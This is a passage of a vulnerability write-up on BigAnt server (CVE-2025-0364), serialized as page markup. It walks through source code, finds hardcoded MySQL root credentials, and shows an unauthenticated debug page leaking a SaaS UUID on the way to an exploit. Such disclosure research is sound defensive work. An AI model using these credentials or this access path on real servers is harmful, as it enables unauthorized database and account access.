,48195],{"class":4640},[1373,48513,48226],{"class":4652},[1373,48515,4713],{"class":1387},[1373,48517,445],{"class":1391},[1373,48519,1388],{"class":1387},[1373,48521,9062],{"class":4640},[1373,48523,48524,48526,48529,48531,48533,48535,48538,48540,48542,48544],{"class":1375,"line":4947},[1373,48525,48179],{"class":1387},[1373,48527,48528],{"class":1391},"AUTH_CODE",[1373,48530,19169],{"class":1387},[1373,48532,48187],{"class":7293},[1373,48534,1384],{"class":4640},[1373,48536,48537],{"class":5467},"2000",[1373,48539,48195],{"class":4640},[1373,48541,48226],{"class":4652},[1373,48543,5571],{"class":1387},[1373,48545,9062],{"class":4640},[1373,48547,48548,48550,48553,48555,48557,48559
,48561,48563,48565,48567,48569,48571],{"class":1375,"line":4952},[1373,48549,48179],{"class":1387},[1373,48551,48552],{"class":1391},"AUTH_EXPIREDATE",[1373,48554,19169],{"class":1387},[1373,48556,48187],{"class":7293},[1373,48558,1384],{"class":4640},[1373,48560,48292],{"class":5467},[1373,48562,48195],{"class":4640},[1373,48564,48226],{"class":4652},[1373,48566,4713],{"class":1387},[1373,48568,445],{"class":1391},[1373,48570,1388],{"class":1387},[1373,48572,9062],{"class":4640},[1373,48574,48575,48577,48580,48582,48584,48586,48588,48590,48592,48594],{"class":1375,"line":6776},[1373,48576,48179],{"class":1387},[1373,48578,48579],{"class":1391},"SAAS_PWD",[1373,48581,19169],{"class":1387},[1373,48583,48187],{"class":7293},[1373,48585,1384],{"class":4640},[1373,48587,48192],{"class":5467},[1373,48589,48195],{"class":4640},[1373,48591,48226],{"class":4652},[1373,48593,5571],{"class":1387},[1373,48595,9062],{"class":4640},[1373,48597,48598,48600,48603,48605,48607,48609,48611,48613,48615,48617],{"class":1375,"line":6781},[1373,48599,48179],{"class":1387},[1373,48601,48602],{"class":1391},"SAAS_INSTALLDATE",[1373,48604,19169],{"class":1387},[1373,48606,48187],{"class":7293},[1373,48608,1384],{"class":4640},[1373,48610,48292],{"class":5467},[1373,48612,48195],{"class":4640},[1373,48614,48226],{"class":4652},[1373,48616,5571],{"class":1387},[1373,48618,9062],{"class":4640},[1373,48620,48621,48624,48626,48628,48630,48632],{"class":1375,"line":7524},[1373,48622,48623],{"class":4652},"  PRIMARY KEY",[1373,48625,4641],{"class":4640},[1373,48627,19169],{"class":1387},[1373,48629,48182],{"class":1391},[1373,48631,19169],{"class":1387},[1373,48633,11875],{"class":4640},[1373,48635,48636,48639,48641,48644,48646,48649,48651],{"class":1375,"line":7530},[1373,48637,48638],{"class":4640},") ENGINE",[1373,48640,5417],{"class":1397},[1373,48642,48643],{"class":4640},"InnoDB ",[1373,48645,48226],{"class":4652},[1373,48647,48648],{"class":4640}," 
CHARSET",[1373,48650,5417],{"class":1397},[1373,48652,48653],{"class":4640},"utf8;\n",[18,48655,48656],{},"Great, now we have the corresponding table that handles SaaS registration and we just need to verify that our data is in the database. Another quick little grep for the MySQL connection string shows the following:",[1354,48658,48660],{"className":1367,"code":48659,"language":1369,"meta":219,"style":219},"Demo\u002FController\u002FTestController.class.php\n29:     $dbconfig['DB_TYPE']='mysql' ;\n55:     $conns[] = array('mysql','127.0.0.1','3306','root','www.upsoft01.com','antdbms_aipu');\n85:     \u002F\u002F$conns[] = array('mysql','127.0.0.1','3306','root','www.upsoft01.com','antdbms_aipu');\n214:        \u002F\u002Fvar_dump(function_exists('mysql_connect'));\n",[886,48661,48662,48686,48720,48794,48804],{"__ignoreMap":219},[1373,48663,48664,48667,48669,48672,48674,48677,48679,48681,48683],{"class":1375,"line":1376},[1373,48665,48666],{"class":2326},"Demo",[1373,48668,2180],{"class":1397},[1373,48670,48671],{"class":2326},"Controller",[1373,48673,2180],{"class":1397},[1373,48675,48676],{"class":2326},"TestController",[1373,48678,59],{"class":1397},[1373,48680,27318],{"class":7293},[1373,48682,59],{"class":1397},[1373,48684,48685],{"class":2326},"php\n",[1373,48687,48688,48691,48693,48695,48698,48700,48702,48705,48707,48709,48711,48713,48716,48718],{"class":1375,"line":220},[1373,48689,48690],{"class":5467},"29",[1373,48692,4606],{"class":1383},[1373,48694,35280],{"class":1383},[1373,48696,48697],{"class":4640},"dbconfig",[1373,48699,7035],{"class":1383},[1373,48701,1388],{"class":1387},[1373,48703,48704],{"class":1391},"DB_TYPE",[1373,48706,1388],{"class":1387},[1373,48708,15050],{"class":1383},[1373,48710,5417],{"class":1397},[1373,48712,1388],{"class":1387},[1373,48714,48715],{"class":1391},"mysql",[1373,48717,1388],{"class":1387},[1373,48719,47289],{"class":1383},[1373,48721,48722,48725,48727,48729,48732,48734,48736,48739,48741,48743,48745,48747,48749,48751
,48754,48756,48758,48760,48763,48765,48767,48769,48772,48774,48776,48778,48781,48783,48785,48787,48790,48792],{"class":1375,"line":1266},[1373,48723,48724],{"class":5467},"55",[1373,48726,4606],{"class":1383},[1373,48728,35280],{"class":1383},[1373,48730,48731],{"class":4640},"conns",[1373,48733,7124],{"class":1383},[1373,48735,8575],{"class":1397},[1373,48737,48738],{"class":1379}," array",[1373,48740,1384],{"class":1383},[1373,48742,1388],{"class":1387},[1373,48744,48715],{"class":1391},[1373,48746,1388],{"class":1387},[1373,48748,5437],{"class":1383},[1373,48750,1388],{"class":1387},[1373,48752,48753],{"class":1391},"127.0.0.1",[1373,48755,1388],{"class":1387},[1373,48757,5437],{"class":1383},[1373,48759,1388],{"class":1387},[1373,48761,48762],{"class":1391},"3306",[1373,48764,1388],{"class":1387},[1373,48766,5437],{"class":1383},[1373,48768,1388],{"class":1387},[1373,48770,48771],{"class":1391},"root",[1373,48773,1388],{"class":1387},[1373,48775,5437],{"class":1383},[1373,48777,1388],{"class":1387},[1373,48779,48780],{"class":1391},"www.upsoft01.com",[1373,48782,1388],{"class":1387},[1373,48784,5437],{"class":1383},[1373,48786,1388],{"class":1387},[1373,48788,48789],{"class":1391},"antdbms_aipu",[1373,48791,1388],{"class":1387},[1373,48793,4680],{"class":1383},[1373,48795,48796,48799,48801],{"class":1375,"line":1852},[1373,48797,48798],{"class":5467},"85",[1373,48800,4606],{"class":1383},[1373,48802,48803],{"class":4630},"     \u002F\u002F$conns[] = array('mysql','127.0.0.1','3306','root','www.upsoft01.com','antdbms_aipu');\n",[1373,48805,48806,48809,48811],{"class":1375,"line":4692},[1373,48807,48808],{"class":5467},"214",[1373,48810,4606],{"class":1383},[1373,48812,48813],{"class":4630},"        \u002F\u002Fvar_dump(function_exists('mysql_connect'));\n",[18,48815,48816,48817,48820],{},"Sure enough, a quick MySQL connection on the server later with ",[886,48818,48819],{},"root:www.upsoft01.com"," and we can see the following entries for the 
table:",[18,48822,48823],{},[68,48824],{"alt":48825,"src":48826,":width":10862},"BigAnt registration sys_saas database entries","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-3-saas-registration-db.png",[18,48828,48829,48830,48832],{},"This validates that the entries are actually be created with the data we provided, and shows that we need to figure out a way to get access to the ",[886,48831,48182],{}," value. It's also important to note the multiple UUIDs and SaaS organizations, as it will come up later when we mature the exploit.",[61,48834,48836],{"id":48835},"debug-activation-uuid-leak","Debug Activation UUID Leak",[18,48838,48839,48840,1554,48843,48846,48847,48850,48851,48854],{},"A quick glance through the application logic shows that we need to look for instances where ",[886,48841,48842],{},"$_SESSION['saas']",[886,48844,48845],{},"sp_saas_id()"," is called and accessible by a user or unauthenticated in order for us to recover the UUID. The ",[886,48848,48849],{},"sp_saas_id"," function can be found in ",[886,48852,48853],{},"Application\u002FCommon\u002FCommon\u002Fsite.php:143"," and corroborates this:",[1354,48856,48858],{"className":1367,"code":48857,"language":1369,"meta":219,"style":219},"function sp_saas_id(){\n    if (! 
$_SESSION['saas'])\n        return '';\n\n    return $_SESSION['saas']['saas_id'];\n}\n",[886,48859,48860,48869,48893,48901,48905,48931],{"__ignoreMap":219},[1373,48861,48862,48864,48867],{"class":1375,"line":1376},[1373,48863,8560],{"class":7293},[1373,48865,48866],{"class":7297}," sp_saas_id",[1373,48868,47121],{"class":1383},[1373,48870,48871,48873,48875,48877,48879,48882,48884,48886,48889,48891],{"class":1375,"line":220},[1373,48872,4695],{"class":4636},[1373,48874,4641],{"class":1383},[1373,48876,16090],{"class":1397},[1373,48878,4656],{"class":1383},[1373,48880,48881],{"class":4640},"_SESSION",[1373,48883,7035],{"class":1383},[1373,48885,1388],{"class":1387},[1373,48887,48888],{"class":1391},"saas",[1373,48890,1388],{"class":1387},[1373,48892,11842],{"class":1383},[1373,48894,48895,48897,48899],{"class":1375,"line":1266},[1373,48896,4918],{"class":4636},[1373,48898,5571],{"class":1387},[1373,48900,4912],{"class":1383},[1373,48902,48903],{"class":1375,"line":1852},[1373,48904,6520],{"emptyLinePlaceholder":237},[1373,48906,48907,48909,48911,48913,48915,48917,48919,48921,48923,48925,48927,48929],{"class":1375,"line":4692},[1373,48908,7340],{"class":4636},[1373,48910,4656],{"class":1383},[1373,48912,48881],{"class":4640},[1373,48914,7035],{"class":1383},[1373,48916,1388],{"class":1387},[1373,48918,48888],{"class":1391},[1373,48920,1388],{"class":1387},[1373,48922,11832],{"class":1383},[1373,48924,1388],{"class":1387},[1373,48926,47076],{"class":1391},[1373,48928,1388],{"class":1387},[1373,48930,34699],{"class":1383},[1373,48932,48933],{"class":1375,"line":4724},[1373,48934,1855],{"class":1383},[18,48936,48937,48938,48940,48941,4606],{},"Some static analysis (ripgrep my dearest) allowed us to identify roughly ~200 instances of ",[886,48939,48849],{}," calls, and some more quick session checks narrow down any that don't require authentication. 
One entry stood out far more than the others in ",[886,48942,48943],{},"Application\u002FDemo\u002FView\u002FApi\u002Findex.html",[1354,48945,48947],{"className":8228,"code":48946,"language":8230,"meta":219,"style":219},"\u003C!DOCTYPE html>\n\u003Chtml>\n  \u003Chead>\n    \u003Cmeta charset=\"utf-8\">\n    \u003Clink href=\"__PUBLIC__\u002Fstatic\u002Fbootstrap\u002Fcss\u002Fbootstrap.min.css\" rel=\"stylesheet\">\n    \u003Clink href=\"__PUBLIC__\u002Fstatic\u002Fbootstrap\u002Ffont-awesome\u002F4.2.0\u002Fcss\u002Ffont-awesome.min.css\"  rel=\"stylesheet\" type=\"text\u002Fcss\">\n    \u003Clink href=\"__PUBLIC__\u002F{$Think.MODULE_NAME}\u002Fcss\u002Fsite.css\" rel=\"stylesheet\">\n    \u003Cscript src=\"__PUBLIC__\u002Fstatic\u002Fjquery.js\">\u003C\u002Fscript>\n \u003C\u002Fhead>\n  \u003Cbody>\n    \n    \n    \u003Cvolist name=\"list\" id=\"module\" key=\"i\">\n        \u003Cvolist name=\"module['methods']\" id=\"method\">\n            \u003Ca id=\"{$module['name']}_{$method['name']}\">\u003C\u002Fa>\n            \u003Cform method=\"post\" target=\"_blank\" action=\"\u002Fapi\u002F{$module['name']}\u002F{$method['name']}.html\" enctype=\"multipart\u002Fform-data\">\n                \u003Ch1>{$module['name']}\u002F{$method['name']}【{$method['intro']}】\u003C\u002Fh1>\n                \u003Cdiv class=\"cmd\">\n                    \u003Ca href=\"#\" class=\"clear\">{:L('_CLEAN_SELECT_OPTIONS_')}\u003C\u002Fa>\n                \u003C\u002Fdiv>\n                \n                \u003Cdiv class=\"item-option\">\n                    \u003Clabel> ssid\u003C\u002Flabel>\n                    \u003Cinput type=\"text\" name=\"ssid\" value=\"{:sp_saas_id()}\">\n                    \u003Cspan class=\"intro\">SAAS ID\u003C\u002Fspan>\n                \u003C\u002Fdiv>\n                \u003Cdiv class=\"item-option\">\n                    \u003Clabel>\u003Ci>*\u003C\u002Fi> 
uid\u003C\u002Flabel>\n",[886,48948,48949,48959,48967,48977,48998,49030,49071,49100,49125,49134,49142,49146,49150,49193,49223,49246,49299,49316,49334,49372,49380,49385,49404,49422,49463,49491,49499,49517],{"__ignoreMap":219},[1373,48950,48951,48953,48955,48957],{"class":1375,"line":1376},[1373,48952,6755],{"class":1383},[1373,48954,6758],{"class":6300},[1373,48956,6762],{"class":8252},[1373,48958,6765],{"class":1383},[1373,48960,48961,48963,48965],{"class":1375,"line":220},[1373,48962,11852],{"class":1383},[1373,48964,8230],{"class":6300},[1373,48966,6765],{"class":1383},[1373,48968,48969,48972,48975],{"class":1375,"line":1266},[1373,48970,48971],{"class":1383},"  \u003C",[1373,48973,48974],{"class":6300},"head",[1373,48976,6765],{"class":1383},[1373,48978,48979,48981,48984,48987,48989,48991,48994,48996],{"class":1375,"line":1852},[1373,48980,8246],{"class":1383},[1373,48982,48983],{"class":6300},"meta",[1373,48985,48986],{"class":8252}," charset",[1373,48988,5417],{"class":1383},[1373,48990,183],{"class":1387},[1373,48992,48993],{"class":1391},"utf-8",[1373,48995,183],{"class":1387},[1373,48997,6765],{"class":1383},[1373,48999,49000,49002,49004,49007,49009,49011,49014,49016,49019,49021,49023,49026,49028],{"class":1375,"line":4692},[1373,49001,8246],{"class":1383},[1373,49003,30586],{"class":6300},[1373,49005,49006],{"class":8252}," href",[1373,49008,5417],{"class":1383},[1373,49010,183],{"class":1387},[1373,49012,49013],{"class":1391},"__PUBLIC__\u002Fstatic\u002Fbootstrap\u002Fcss\u002Fbootstrap.min.css",[1373,49015,183],{"class":1387},[1373,49017,49018],{"class":8252}," 
rel",[1373,49020,5417],{"class":1383},[1373,49022,183],{"class":1387},[1373,49024,49025],{"class":1391},"stylesheet",[1373,49027,183],{"class":1387},[1373,49029,6765],{"class":1383},[1373,49031,49032,49034,49036,49038,49040,49042,49045,49047,49050,49052,49054,49056,49058,49060,49062,49064,49067,49069],{"class":1375,"line":4724},[1373,49033,8246],{"class":1383},[1373,49035,30586],{"class":6300},[1373,49037,49006],{"class":8252},[1373,49039,5417],{"class":1383},[1373,49041,183],{"class":1387},[1373,49043,49044],{"class":1391},"__PUBLIC__\u002Fstatic\u002Fbootstrap\u002Ffont-awesome\u002F4.2.0\u002Fcss\u002Ffont-awesome.min.css",[1373,49046,183],{"class":1387},[1373,49048,49049],{"class":8252},"  rel",[1373,49051,5417],{"class":1383},[1373,49053,183],{"class":1387},[1373,49055,49025],{"class":1391},[1373,49057,183],{"class":1387},[1373,49059,8253],{"class":8252},[1373,49061,5417],{"class":1383},[1373,49063,183],{"class":1387},[1373,49065,49066],{"class":1391},"text\u002Fcss",[1373,49068,183],{"class":1387},[1373,49070,6765],{"class":1383},[1373,49072,49073,49075,49077,49079,49081,49083,49086,49088,49090,49092,49094,49096,49098],{"class":1375,"line":4756},[1373,49074,8246],{"class":1383},[1373,49076,30586],{"class":6300},[1373,49078,49006],{"class":8252},[1373,49080,5417],{"class":1383},[1373,49082,183],{"class":1387},[1373,49084,49085],{"class":1391},"__PUBLIC__\u002F{$Think.MODULE_NAME}\u002Fcss\u002Fsite.css",[1373,49087,183],{"class":1387},[1373,49089,49018],{"class":8252},[1373,49091,5417],{"class":1383},[1373,49093,183],{"class":1387},[1373,49095,49025],{"class":1391},[1373,49097,183],{"class":1387},[1373,49099,6765],{"class":1383},[1373,49101,49102,49104,49106,49109,49111,49113,49116,49118,49121,49123],{"class":1375,"line":4768},[1373,49103,8246],{"class":1383},[1373,49105,8249],{"class":6300},[1373,49107,49108],{"class":8252}," 
src",[1373,49110,5417],{"class":1383},[1373,49112,183],{"class":1387},[1373,49114,49115],{"class":1391},"__PUBLIC__\u002Fstatic\u002Fjquery.js",[1373,49117,183],{"class":1387},[1373,49119,49120],{"class":1383},">\u003C\u002F",[1373,49122,8249],{"class":6300},[1373,49124,6765],{"class":1383},[1373,49126,49127,49130,49132],{"class":1375,"line":4792},[1373,49128,49129],{"class":1383}," \u003C\u002F",[1373,49131,48974],{"class":6300},[1373,49133,6765],{"class":1383},[1373,49135,49136,49138,49140],{"class":1375,"line":4798},[1373,49137,48971],{"class":1383},[1373,49139,20718],{"class":6300},[1373,49141,6765],{"class":1383},[1373,49143,49144],{"class":1375,"line":4806},[1373,49145,47181],{"class":4640},[1373,49147,49148],{"class":1375,"line":4817},[1373,49149,47181],{"class":4640},[1373,49151,49152,49154,49157,49159,49161,49163,49166,49168,49170,49172,49174,49177,49179,49182,49184,49186,49189,49191],{"class":1375,"line":4825},[1373,49153,8246],{"class":1383},[1373,49155,49156],{"class":46492},"volist",[1373,49158,46496],{"class":8252},[1373,49160,5417],{"class":1383},[1373,49162,183],{"class":1387},[1373,49164,49165],{"class":1391},"list",[1373,49167,183],{"class":1387},[1373,49169,7911],{"class":8252},[1373,49171,5417],{"class":1383},[1373,49173,183],{"class":1387},[1373,49175,49176],{"class":1391},"module",[1373,49178,183],{"class":1387},[1373,49180,49181],{"class":8252}," 
key",[1373,49183,5417],{"class":1383},[1373,49185,183],{"class":1387},[1373,49187,49188],{"class":1391},"i",[1373,49190,183],{"class":1387},[1373,49192,6765],{"class":1383},[1373,49194,49195,49197,49199,49201,49203,49205,49208,49210,49212,49214,49216,49219,49221],{"class":1375,"line":4835},[1373,49196,46606],{"class":1383},[1373,49198,49156],{"class":46492},[1373,49200,46496],{"class":8252},[1373,49202,5417],{"class":1383},[1373,49204,183],{"class":1387},[1373,49206,49207],{"class":1391},"module['methods']",[1373,49209,183],{"class":1387},[1373,49211,7911],{"class":8252},[1373,49213,5417],{"class":1383},[1373,49215,183],{"class":1387},[1373,49217,49218],{"class":1391},"method",[1373,49220,183],{"class":1387},[1373,49222,6765],{"class":1383},[1373,49224,49225,49227,49229,49231,49233,49235,49238,49240,49242,49244],{"class":1375,"line":4843},[1373,49226,46655],{"class":1383},[1373,49228,47],{"class":6300},[1373,49230,7911],{"class":8252},[1373,49232,5417],{"class":1383},[1373,49234,183],{"class":1387},[1373,49236,49237],{"class":1391},"{$module['name']}_{$method['name']}",[1373,49239,183],{"class":1387},[1373,49241,49120],{"class":1383},[1373,49243,47],{"class":6300},[1373,49245,6765],{"class":1383},[1373,49247,49248,49250,49252,49254,49256,49258,49260,49262,49265,49267,49269,49271,49273,49276,49278,49280,49283,49285,49288,49290,49292,49295,49297],{"class":1375,"line":4849},[1373,49249,46655],{"class":1383},[1373,49251,21325],{"class":6300},[1373,49253,46570],{"class":8252},[1373,49255,5417],{"class":1383},[1373,49257,183],{"class":1387},[1373,49259,46577],{"class":1391},[1373,49261,183],{"class":1387},[1373,49263,49264],{"class":8252}," target",[1373,49266,5417],{"class":1383},[1373,49268,183],{"class":1387},[1373,49270,10881],{"class":1391},[1373,49272,183],{"class":1387},[1373,49274,49275],{"class":8252}," 
action",[1373,49277,5417],{"class":1383},[1373,49279,183],{"class":1387},[1373,49281,49282],{"class":1391},"\u002Fapi\u002F{$module['name']}\u002F{$method['name']}.html",[1373,49284,183],{"class":1387},[1373,49286,49287],{"class":8252}," enctype",[1373,49289,5417],{"class":1383},[1373,49291,183],{"class":1387},[1373,49293,49294],{"class":1391},"multipart\u002Fform-data",[1373,49296,183],{"class":1387},[1373,49298,6765],{"class":1383},[1373,49300,49301,49303,49305,49307,49310,49312,49314],{"class":1375,"line":4877},[1373,49302,46674],{"class":1383},[1373,49304,1920],{"class":6300},[1373,49306,5384],{"class":1383},[1373,49308,49309],{"class":4640},"{$module['name']}\u002F{$method['name']}【{$method['intro']}】",[1373,49311,46627],{"class":1383},[1373,49313,1920],{"class":6300},[1373,49315,6765],{"class":1383},[1373,49317,49318,49320,49322,49324,49326,49328,49330,49332],{"class":1375,"line":4915},[1373,49319,46674],{"class":1383},[1373,49321,46588],{"class":6300},[1373,49323,27205],{"class":8252},[1373,49325,5417],{"class":1383},[1373,49327,183],{"class":1387},[1373,49329,17653],{"class":1391},[1373,49331,183],{"class":1387},[1373,49333,6765],{"class":1383},[1373,49335,49336,49338,49340,49342,49344,49346,49348,49350,49352,49354,49356,49359,49361,49363,49366,49368,49370],{"class":1375,"line":4931},[1373,49337,46694],{"class":1383},[1373,49339,47],{"class":6300},[1373,49341,49006],{"class":8252},[1373,49343,5417],{"class":1383},[1373,49345,183],{"class":1387},[1373,49347,9452],{"class":1391},[1373,49349,183],{"class":1387},[1373,49351,27205],{"class":8252},[1373,49353,5417],{"class":1383},[1373,49355,183],{"class":1387},[1373,49357,49358],{"class":1391},"clear",[1373,49360,183],{"class":1387},[1373,49362,5384],{"class":1383},[1373,49364,49365],{"class":4640},"{:L('_CLEAN_SELECT_OPTIONS_')}",[1373,49367,46627],{"class":1383},[1373,49369,47],{"class":6300},[1373,49371,6765],{"class":1383},[1373,49373,49374,49376,49378],{"class":1375,"line":4947},[1373,49375,46779],{"class":1
383},[1373,49377,46588],{"class":6300},[1373,49379,6765],{"class":1383},[1373,49381,49382],{"class":1375,"line":4952},[1373,49383,49384],{"class":4640},"                \n",[1373,49386,49387,49389,49391,49393,49395,49397,49400,49402],{"class":1375,"line":6776},[1373,49388,46674],{"class":1383},[1373,49390,46588],{"class":6300},[1373,49392,27205],{"class":8252},[1373,49394,5417],{"class":1383},[1373,49396,183],{"class":1387},[1373,49398,49399],{"class":1391},"item-option",[1373,49401,183],{"class":1387},[1373,49403,6765],{"class":1383},[1373,49405,49406,49408,49411,49413,49416,49418,49420],{"class":1375,"line":6781},[1373,49407,46694],{"class":1383},[1373,49409,49410],{"class":6300},"label",[1373,49412,5384],{"class":1383},[1373,49414,49415],{"class":4640}," ssid",[1373,49417,46627],{"class":1383},[1373,49419,49410],{"class":6300},[1373,49421,6765],{"class":1383},[1373,49423,49424,49426,49428,49430,49432,49434,49436,49438,49440,49442,49444,49447,49449,49452,49454,49456,49459,49461],{"class":1375,"line":7524},[1373,49425,46694],{"class":1383},[1373,49427,15129],{"class":6300},[1373,49429,8253],{"class":8252},[1373,49431,5417],{"class":1383},[1373,49433,183],{"class":1387},[1373,49435,1359],{"class":1391},[1373,49437,183],{"class":1387},[1373,49439,46496],{"class":8252},[1373,49441,5417],{"class":1383},[1373,49443,183],{"class":1387},[1373,49445,49446],{"class":1391},"ssid",[1373,49448,183],{"class":1387},[1373,49450,49451],{"class":8252}," 
value",[1373,49453,5417],{"class":1383},[1373,49455,183],{"class":1387},[1373,49457,49458],{"class":1391},"{:sp_saas_id()}",[1373,49460,183],{"class":1387},[1373,49462,6765],{"class":1383},[1373,49464,49465,49467,49469,49471,49473,49475,49478,49480,49482,49485,49487,49489],{"class":1375,"line":7530},[1373,49466,46694],{"class":1383},[1373,49468,1373],{"class":6300},[1373,49470,27205],{"class":8252},[1373,49472,5417],{"class":1383},[1373,49474,183],{"class":1387},[1373,49476,49477],{"class":1391},"intro",[1373,49479,183],{"class":1387},[1373,49481,5384],{"class":1383},[1373,49483,49484],{"class":4640},"SAAS ID",[1373,49486,46627],{"class":1383},[1373,49488,1373],{"class":6300},[1373,49490,6765],{"class":1383},[1373,49492,49493,49495,49497],{"class":1375,"line":7546},[1373,49494,46779],{"class":1383},[1373,49496,46588],{"class":6300},[1373,49498,6765],{"class":1383},[1373,49500,49501,49503,49505,49507,49509,49511,49513,49515],{"class":1375,"line":7571},[1373,49502,46674],{"class":1383},[1373,49504,46588],{"class":6300},[1373,49506,27205],{"class":8252},[1373,49508,5417],{"class":1383},[1373,49510,183],{"class":1387},[1373,49512,49399],{"class":1391},[1373,49514,183],{"class":1387},[1373,49516,6765],{"class":1383},[1373,49518,49519,49521,49523,49526,49528,49530,49532,49534,49536,49538,49541,49543,49545],{"class":1375,"line":7598},[1373,49520,46694],{"class":1383},[1373,49522,49410],{"class":6300},[1373,49524,49525],{"class":1383},">\u003C",[1373,49527,49188],{"class":6300},[1373,49529,5384],{"class":1383},[1373,49531,35613],{"class":4640},[1373,49533,46627],{"class":1383},[1373,49535,49188],{"class":6300},[1373,49537,5384],{"class":1383},[1373,49539,49540],{"class":4640}," uid",[1373,49542,46627],{"class":1383},[1373,49544,49410],{"class":6300},[1373,49546,6765],{"class":1383},[18,49548,49549,49550,49552],{},"Opening up this page in a empty session shows the following demo page, which contains almost all API calls but most importantly fills the forms with the called 
",[886,49551,48849],{}," function call:",[18,49554,49555],{},[68,49556],{"alt":49557,"src":49558,":width":10862},"BigAnt demo page leaking sp_saas_id","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-4-demo-page.png",[18,49560,49561,49562,49564,49565,49568,49569,49572,49573,49575],{},"What's up with the ",[886,49563,49446],{}," UUID value of ",[886,49566,49567],{},"122C8BFA-BD74-9668-BE31-EA159FB2C437"," and why is that the UUID tied to a ",[886,49570,49571],{},"antdbms_pwn"," object from the previous database ",[886,49574,48156],{}," query? Where did it come from?",[18,49577,49578,49579,49581,49582,49584],{},"It turns out that SaaS ID from the application gets assigned to the first created ",[886,49580,48888],{}," organization and if your role or session does not have a currently assigned one, the first created one is set as the default. This presents a problem, we cannot retrieve the information that we submitted when registering when submitting the organization registration because that object will get assigned and we don't know the email, org name, and password for that organization. Theoretically, if the attacker creates the first organization this would be a usable path, but we want something better. Let's see if we can find a way to force a session to belong to a ",[886,49583,48888],{}," org with our controlled information and grantee success.",[61,49586,49588],{"id":49587},"forcing-saas-session","Forcing SaaS Session",[18,49590,49591,49592,4606],{},"This time, we weren't quite as lucky to find a session assigned variable in a debug page, nor a quick function call. Looking for all interactions with identified SaaS variable names gave us quite a few places to look. 
Ironically, some manual review showed that the primary login page index function contained some suspicious looking code at ",[886,49593,49594],{},"Application\u002FHome\u002FController\u002FLoginController.class.php:90",[1354,49596,49598],{"className":1367,"code":49597,"language":1369,"meta":219,"style":219},"\u002F**\n * 登录\n *\u002F\npublic function index(){\n\n    $to = I('to','admin','htmlspecialchars') ;\n    $app = I('app');\n    $saas = I('saas');\n\n    if (! $saas) {\n        $saas = cookie('saas');\n    }\n    \n\n    \n    \u002F\u002F20170418 针对只有一个SAAS的企业，默认给出企业ID\n    \u002F\u002F李成提的需求\n    $M = D('Common\u002FSaas');\n    $data = null ;\n    if ($saas){\n        \u002F\u002F20170518 如果是登妨系统管理台，那个数据库密码如果是 默认密码，那么显示出来\n        $data = $M->where(array('saas_name'=>$saas))->fetchSql(false)->select();\n    }\n\n    \u002F\u002F\n    if (! $data){\n        $data = $M->fetchSql(false)->select();\n    } \n\n    \n    $saas = $data[0]['saas_name'] ;\n\n    \n\n    \u002F\u002F20170419 加入默认的帐号\n    $account = htmlspecialchars($_COOKIE['account']) ;\n    if (! $account){\n        $account = 'superadmin';\n    }\n    \n    \n    $this->assign('saas',$saas) ;\n    $this->assign('account',$account) ;\n    $this->assign('metaTitle',C('PRODUCT_NAME') . ' ' . 
L('_LOGIN_TITLE_')) ;\n    $this->assign('to',$to) ;\n    $this->assign('app',$app) ;\n    \n    if(I('flag')){\n        $this->assign('flag',I('flag')) ;\n    }\n",[886,49599,49600,49604,49609,49613,49624,49628,49670,49692,49713,49717,49733,49754,49758,49762,49766,49770,49775,49780,49800,49812,49822,49827,49881,49885,49889,49894,49908,49936,49942,49946,49950,49978,49982,49986,49990,49995,50025,50039,50056,50060,50064,50068,50094,50118,50174,50198,50222,50226,50246,50278],{"__ignoreMap":219},[1373,49601,49602],{"class":1375,"line":1376},[1373,49603,47086],{"class":4630},[1373,49605,49606],{"class":1375,"line":220},[1373,49607,49608],{"class":4630}," * 登录\n",[1373,49610,49611],{"class":1375,"line":1266},[1373,49612,47111],{"class":4630},[1373,49614,49615,49617,49620,49622],{"class":1375,"line":1852},[1373,49616,15019],{"class":4652},[1373,49618,49619],{"class":7293}," function",[1373,49621,38984],{"class":7297},[1373,49623,47121],{"class":1383},[1373,49625,49626],{"class":1375,"line":4692},[1373,49627,6520],{"emptyLinePlaceholder":237},[1373,49629,49630,49632,49635,49637,49640,49642,49644,49647,49649,49651,49653,49655,49657,49659,49661,49664,49666,49668],{"class":1375,"line":4724},[1373,49631,7362],{"class":1383},[1373,49633,49634],{"class":4640},"to ",[1373,49636,5417],{"class":1397},[1373,49638,49639],{"class":7297}," I",[1373,49641,1384],{"class":1383},[1373,49643,1388],{"class":1387},[1373,49645,49646],{"class":1391},"to",[1373,49648,1388],{"class":1387},[1373,49650,5437],{"class":1383},[1373,49652,1388],{"class":1387},[1373,49654,5800],{"class":1391},[1373,49656,1388],{"class":1387},[1373,49658,5437],{"class":1383},[1373,49660,1388],{"class":1387},[1373,49662,49663],{"class":1391},"htmlspecialchars",[1373,49665,1388],{"class":1387},[1373,49667,2230],{"class":1383},[1373,49669,47289],{"class":1383},[1373,49671,49672,49674,49677,49679,49681,49683,49685,49688,49690],{"class":1375,"line":4756},[1373,49673,7362],{"class":1383},[1373,49675,49676],{"class":4640},"app 
",[1373,49678,5417],{"class":1397},[1373,49680,49639],{"class":7297},[1373,49682,1384],{"class":1383},[1373,49684,1388],{"class":1387},[1373,49686,49687],{"class":1391},"app",[1373,49689,1388],{"class":1387},[1373,49691,4680],{"class":1383},[1373,49693,49694,49696,49699,49701,49703,49705,49707,49709,49711],{"class":1375,"line":4768},[1373,49695,7362],{"class":1383},[1373,49697,49698],{"class":4640},"saas ",[1373,49700,5417],{"class":1397},[1373,49702,49639],{"class":7297},[1373,49704,1384],{"class":1383},[1373,49706,1388],{"class":1387},[1373,49708,48888],{"class":1391},[1373,49710,1388],{"class":1387},[1373,49712,4680],{"class":1383},[1373,49714,49715],{"class":1375,"line":4792},[1373,49716,6520],{"emptyLinePlaceholder":237},[1373,49718,49719,49721,49723,49725,49727,49729,49731],{"class":1375,"line":4798},[1373,49720,4695],{"class":4636},[1373,49722,4641],{"class":1383},[1373,49724,16090],{"class":1397},[1373,49726,4656],{"class":1383},[1373,49728,48888],{"class":4640},[1373,49730,2230],{"class":1383},[1373,49732,4765],{"class":1383},[1373,49734,49735,49737,49739,49741,49744,49746,49748,49750,49752],{"class":1375,"line":4806},[1373,49736,4727],{"class":1383},[1373,49738,49698],{"class":4640},[1373,49740,5417],{"class":1397},[1373,49742,49743],{"class":7297}," 